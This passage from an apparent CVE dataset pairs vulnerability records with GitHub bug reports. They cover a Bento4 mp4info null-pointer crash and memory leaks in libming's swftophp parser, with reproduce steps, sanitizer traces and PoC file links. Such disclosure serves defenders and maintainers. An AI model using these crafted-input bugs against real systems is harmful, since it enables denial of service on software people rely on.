0x7fe97e71a082 in __libc_start_main ../csu/libc-start.c:308 #12 0x56038e94a7ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 in AP4_DescriptorFinder::Test(AP4_Descriptor*) const ==973829==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721209/poc-file.txt)
NULL pointer reference from AP4_DescriptorFinder::Test() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/875/comments
1
2023-06-12T10:12:34Z
2024-02-17T17:30:47Z
https://github.com/axiomatic-systems/Bento4/issues/875
1,752,398,555
875
CVE-2024-24146
2024-02-29T01:44:11.657
A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/307" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/307
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13924747/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(7.027344); $m->setDimension(0, 0); $m->setFrames(1799); /*Unknown block type 992*/ /* SWF_REMOVEOBJECT2 */ $m->remove($i2810); /* SWF_DEFINEBUTTON */ skipping 0 bytes /* SWF_PATHSAREPOSTSCRIPT */ /* SWF_NAMECHARACTER */ /* SWF_REMOVEOBJECT2 */ $m->remove($i1799); /*Unknown block type 349*/ /* SWF_DOACTION */ $m->add(new SWFAction("") ); /* SWF_JPEGTABLES */ /* SWF_DOACTION */ ``` * stderr ``` header indicates a filesize of 169083242 but filesize is 190 Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 26 but expecting 31. Stream out of sync after parse of blocktype 7 (SWF_DEFINEBUTTON). 39 but expecting 76. Stream out of sync after parse of blocktype 40 (SWF_NAMECHARACTER). 97 but expecting 90. Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 94 but expecting 99. Stack blown!! - peek ================================================================= ==18465==ERROR: LeakSanitizer: detected memory leaks ... Direct leak of 240 byte(s) in 1 object(s) allocated from: #0 0x55f070ff26b6 in __interceptor_realloc (/home/ubuntu/lab/libming/util/swftophp+0xbb6b6) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55f0710b2975 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1541:41 Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x55f070ff2478 in __interceptor_calloc (/home/ubuntu/lab/libming/util/swftophp+0xbb478) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55f0710b26d4 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1528:47 ... SUMMARY: AddressSanitizer: 42073 byte(s) leaked in 13 allocation(s). ``` You can get full log [here](https://pastebin.com/bwRHeSiW). https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L1523-L1545 On `parseSWF_DEFINEBUTTON` function, we are allocating heap memories on `Characters` and `Actions`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_DEFINEBUTTON
https://api.github.com/repos/libming/libming/issues/307/comments
1
2024-01-12T22:46:35Z
2024-02-21T22:35:18Z
https://github.com/libming/libming/issues/307
2,079,829,395
307
CVE-2024-24147
2024-02-29T01:44:11.693
A memory leak issue discovered in parseSWF_FILLSTYLEARRAY in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/311" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/311
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13925086/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(13); ming_setscale(1.0); $m->setRate(6.941406); $m->setDimension(0, 0); $m->setFrames(1542); /* SWF_PROTECT */ $m->protect("j\njQQQ\nj77777777777777777�j\njQQQ\nj7777!FWS\nj\r\r�\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r�\r\r\rQQQ\r\r\r\r\r\r�j\t�"); /* SWF_DEFINESHAPE3 */ /* Shape 27144 (TYPE=3, RECT=168,-350 64,333)*/ $character27144 = new SWFShape(); /*8 fillstyle(s)*/ /*3 linestyles(s)*/ $character27144_l0_width = 771; $character27144_l0_red = 0x12; $character27144_l0_green = 0x03; $character27144_l0_blue = 0x03; $character27144_l0_alpha = 0x03; $character27144_l1_width = 771; $character27144_l1_red = 0x03; $character27144_l1_green = 0x37; $character27144_l1_blue = 0x37; $character27144_l1_alpha = 0x37; $character27144_l2_width = 14135; $character27144_l2_red = 0x37; $character27144_l2_green = 0x37; $character27144_l2_blue = 0x37; $character27144_l2_alpha = 0x37; /* StateLineStyle: 3 */ $character27144->setLine($character27144_l2_width, $character27144_l2_red, $character27144_l2_green, $character27144_l2_blue, $character27144_l2_alpha); $character27144->setRightFill($character27144_f101058053); $character27144->movePenTo(-9211021, 15132414); /* SWF_DEFINESHAPE3 */ /* Shape 770 (TYPE=3, RECT=0,0 0,0)*/ $character770 = new SWFShape(); /*3 fillstyle(s)*/ /*3 linestyles(s)*/ $character770_l0_width = 786; $character770_l0_red = 0x03; $character770_l0_green = 0x03; $character770_l0_blue = 0x03; $character770_l0_alpha = 0x03; $character770_l1_width = 14083; $character770_l1_red = 0x37; $character770_l1_green = 0x37; $character770_l1_blue = 0x37; $character770_l1_alpha = 0x37; $character770_l2_width = 14135; $character770_l2_red = 0x37; $character770_l2_green = 0x37; $character770_l2_blue = 0x37; $character770_l2_alpha = 0x37; /* StateLineStyle: 3 */ $character770->setLine($character770_l2_width, $character770_l2_red, $character770_l2_green, $character770_l2_blue, $character770_l2_alpha); $character770->setRightFill($character770_f101058054); $character770->movePenTo(-9211021, 16654528); /* SWF_DOACTION */ Action: 5 50:SWFACTION_MBCHR Offset: 32 Action: 6 51:SWFACTION_MBCHR Offset: 33 Action: 7 52:SWFACTION_MBCHR Offset: 34 Action: 8 53:SWFACTION_MBCHR Offset: 35 Action: 9 54:SWFACTION_MBCHR Offset: 36 Action: 10 55:SWFACTION_MBCHR Offset: 37 Action: 11 56:SWFACTION_MBCHR Offset: 38 Action: 12 57:SWFACTION_MBCHR Offset: 39 Action: 13 58:SWFACTION_MBCHR Offset: 3a Action: 14 59:SWFACTION_MBCHR Offset: 3b Action: 15 60:SWFACTION_MBCHR Offset: 3c Action: 16 61:SWFACTION_MBCHR Offset: 3d Action: 17 62:SWFACTION_MBCHR Offset: 3e $m->add(new SWFAction("") ); /*Unknown block type 220*/ skipping 13 bytes /* SWF_FONTREF */ /* SWF_DOACTION */ ``` * stderr ``` header indicates a filesize of 101208077 but filesize is 197 Stream out of sync after parse of blocktype 24 (SWF_PROTECT). 187 but expecting 21. Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 74 but expecting 33. Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 78 but expecting 43. Stack blown!! - pop ================================================================= ==18459==ERROR: LeakSanitizer: detected memory leaks ... Direct leak of 36 byte(s) in 2 object(s) allocated from: #0 0x55a363c6928e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55a363d1e348 in parseSWF_LINESTYLEARRAY /home/ubuntu/lab/libming/util/parser.c:684:25 ... ``` You can get full log [here](https://pastebin.com/88FDcMfE) ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L608-L625 On `parseSWF_FILLSTYLEARRAY`, we allocate `SWF_FILLSTYLE` into heap memory and set member of `fillstyle->FillStyles`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_FILLSTYLEARRAY
https://api.github.com/repos/libming/libming/issues/311/comments
1
2024-01-13T00:00:25Z
2024-02-21T22:33:33Z
https://github.com/libming/libming/issues/311
2,079,901,582
311
CVE-2024-24149
2024-02-29T01:44:11.737
A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/310
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc-3.zip](https://github.com/libming/libming/files/13925051/poc-3.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(255.019531); $m->setDimension(2, -1); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(62719); /* SWF_PLACEOBJECT */ /*Unknown block type 648*/ skipping 59 bytes /* SWF_DEFINESPRITE */ /* MovieClip 2570 */ $character2570 = new SWFMovieClip(); /* 2314 frames */ /* SWF_FREECHARACTER */ /* SWF_DEFINETEXT2 */ $character2056 = new SWFText(2); $character2056->moveTo(2815, 2058); $character2056->addString("X"); 0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$... 0010: 16 01 02 ... header('Content-type: application/x-shockwave-flash'); $m->output(9); ?> ``` * stderr ``` header indicates a filesize of 18446744071613768297 but filesize is 144 Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79. Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123. outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL sudden file end: read failed @125 fileSize 144, request 42 extra garbage (i.e., we messed up in main): ================================================================= ==18453==ERROR: LeakSanitizer: detected memory leaks ... Indirect leak of 80 byte(s) in 10 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89482e4d in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:264:25 Indirect leak of 80 byte(s) in 10 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89482b8f in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:247:23 ``` You can get full log [here](https://pastebin.com/He2AgT1mz). ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L241-L279 On `parseSWF_GLYPHENTRY`, we dynamically allocate `gerec->GlyphIndex`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_GLYPHENTRY
https://api.github.com/repos/libming/libming/issues/310/comments
1
2024-01-12T23:51:34Z
2024-02-21T22:35:36Z
https://github.com/libming/libming/issues/310
2,079,896,237
310
CVE-2024-24150
2024-02-29T01:44:11.777
A memory leak issue discovered in parseSWF_TEXTRECORD in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/309" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/309
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13925031/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(255.019531); $m->setDimension(2, -1); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(62719); /* SWF_PLACEOBJECT */ /*Unknown block type 648*/ skipping 59 bytes /* SWF_DEFINESPRITE */ /* MovieClip 2570 */ $character2570 = new SWFMovieClip(); /* 2314 frames */ /* SWF_FREECHARACTER */ /* SWF_DEFINETEXT2 */ $character2056 = new SWFText(2); $character2056->moveTo(2815, 2058); $character2056->addString("X"); 0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$... 0010: 16 01 02 ... header('Content-type: application/x-shockwave-flash'); $m->output(9); ?> ``` * stderr ``` header indicates a filesize of 18446744071613768297 but filesize is 144 Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79. Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123. outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL sudden file end: read failed @125 fileSize 144, request 42 extra garbage (i.e., we messed up in main): ================================================================= ==18453==ERROR: LeakSanitizer: detected memory leaks ... Indirect leak of 160 byte(s) in 1 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89483a92 in parseSWF_TEXTRECORD /home/ubuntu/lab/libming/util/parser.c:316:26 ... ``` You can get full log [here](https://pastebin.com/AaN48sBN). ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L281-L323 On `parseSWF_TEXTRECORD`, we allocating `brec->GlyphCount` into heap memory, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_TEXTRECORD
https://api.github.com/repos/libming/libming/issues/309/comments
1
2024-01-12T23:44:59Z
2024-02-21T22:47:44Z
https://github.com/libming/libming/issues/309
2,079,890,770
309